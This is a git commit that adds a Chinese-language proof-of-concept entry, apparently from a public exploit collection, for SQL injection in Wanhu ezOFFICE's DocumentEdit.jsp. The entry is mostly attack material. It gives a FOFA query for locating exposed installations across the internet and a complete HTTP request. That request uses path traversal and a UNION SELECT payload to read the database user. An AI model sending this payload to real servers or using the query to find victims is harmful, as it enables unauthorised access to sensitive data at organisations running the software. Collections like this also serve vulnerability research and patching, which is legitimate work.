Create 万户 ezOFFICE DocumentEdit.jsp SQL注入.md

2023-12-15 12:34:45 +08:00 · 2023-12-15 12:34:45 +08:00 · a445765a42
commit a445765a42
parent 0d313d6eea
1 changed files with 18 additions and 0 deletions
--- a/DocumentEdit.jsp
+++ b/DocumentEdit.jsp
@ -0,0 +1,18 @@
+## 万户 ezOFFICE DocumentEdit.jsp SQL注入
+
+DocumentEdit.jsp接口处存在sql注入漏洞，攻击者可获取数据库中敏感信息
+
+## fofa
+```
+app="ezOFFICE协同管理平台"
+```
+
+## poc
+```
+GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1'%20union%20select%20null,null,(select%20user%20from%20dual),null,null,null,null,null,null,null%20from%20dual-- HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+![image](https://github.com/wy876/POC/assets/139549762/899ccb8d-22a3-4c5b-a50b-9d8a64ac73aa)